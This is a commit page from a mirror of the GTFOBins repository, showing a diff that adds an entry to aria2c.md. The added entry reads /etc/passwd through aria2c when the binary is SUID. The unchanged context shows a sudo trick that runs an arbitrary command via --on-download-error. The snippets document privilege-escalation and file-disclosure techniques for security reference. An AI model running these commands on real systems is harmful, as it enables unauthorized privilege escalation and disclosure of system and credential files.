mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-23 11:53:00 +01:00
Update aria2c.md
This commit is contained in:
parent
b724cd9bc1
commit
ef87c22c36
@ -23,6 +23,11 @@ functions:
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
sudo aria2c --on-download-error=$TF http://x
|
||||
suid:
|
||||
- description: It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
|
||||
- code: |
|
||||
LFILE='/etc/passwd'
|
||||
aria2c -i $LFILE
|
||||
limited-suid:
|
||||
- code: |
|
||||
COMMAND='id'
|
||||
|
Loading…
Reference in New Issue
Block a user